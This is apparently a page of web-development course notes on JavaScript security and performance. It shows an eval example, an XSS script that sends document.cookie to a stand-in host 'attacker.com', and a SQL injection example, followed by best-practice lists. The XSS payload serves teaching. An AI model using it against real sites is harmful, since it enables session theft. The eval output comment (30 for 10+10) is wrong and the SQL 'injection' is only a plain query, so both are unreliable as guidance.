20 Security & Performance

Details

Security

Eval

let x = 10
let y = 10
let code = "x+y"

let z = eval(code)

console.log(z)
// 30

XSS - Cross - site scripting

Steal cookie data and send it to another site

<input />



// Type in the following

<script>
   console.log("XSS attack")

   var img = new Image()
   img.src = "http://attacker.com/steal?cookie=" + document.cookie


</script>

SQL injection

<input />



// This code gets pasted into an input
SELECT first_name, age, email, contact_number FROM Customer;

Best Practises for Security

Input Validation: validate and sanitise user input to prevent XXS (cross-site scripting) and SQL injection attacks.
Avoid EVAL
Always use HTTPS rather than HTTP
Authentication and Authorisation : use strong password hashing algorithms.

Best Practices for Performance

Minimize request size: Combine and minify JavaScript code into a single compressed file - use a module bundler.
Use asynhronous operations : Use callbacks, promises or async/await to perform asynchronous operations and avoid blocking the main thread.
Use React to minimise DOM manipulations
Avoid memory leaks - remove event listeners etc
Cache frequently used data in memory or browser storage.
Lazy load modules- to only load resources when needed.
Compress images

20 Security & Performance

React module

React Testing

Styling module

JavaScript libraries

Server related

Misc Module

Useful Applications